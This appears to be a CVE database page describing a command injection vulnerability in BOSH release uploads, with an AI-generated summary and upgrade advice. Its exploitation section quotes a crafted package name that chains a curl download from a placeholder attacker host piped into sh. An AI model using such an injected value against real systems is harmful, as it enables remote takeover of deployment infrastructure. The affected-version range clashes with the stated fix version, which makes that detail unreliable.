CVE-2026-41011
Description
BOSH command injection vulnerability allows authenticated attackers to execute arbitrary commands via crafted package names.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
BOSH command injection vulnerability allows authenticated attackers to execute arbitrary commands via crafted package names.
Vulnerability
PackagePersister.validate_tgz in BOSH versions prior to v282.1.12 is vulnerable to command injection. The name parameter, derived from release.MF within an uploaded tarball, is used to construct a tar -tf command executed via /bin/sh -c without proper shell escaping. The validation for package names occurs too late in the create_package process, after the vulnerable shell command is executed [1].
Exploitation
An attacker with bosh.releases.upload or bosh.admin privileges can craft a release tarball. This tarball would contain a release.MF file specifying a malicious package name, such as x;curl attacker.example/s|sh #. When this release is uploaded, the validate_tgz function will execute the crafted command, leading to arbitrary command execution [1].
Impact
Successful exploitation allows an attacker to execute arbitrary commands on the BOSH director with the privileges of the bosh user. This can lead to a full compromise of the director and any managed infrastructure [1].
Mitigation
Users of affected BOSH versions should upgrade to v282.1.12 or later. This fix was released on or before June 4th, 2026 [1].
AI Insight generated on Jun 4, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Range: <=v282.1.12
Patches
0No patches discovered yet.
Vulnerability mechanics
No source-code context for this CVE — mechanics is only generated when we can read the actual fix diff. Without that, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References
1News mentions
0No linked articles in our index yet.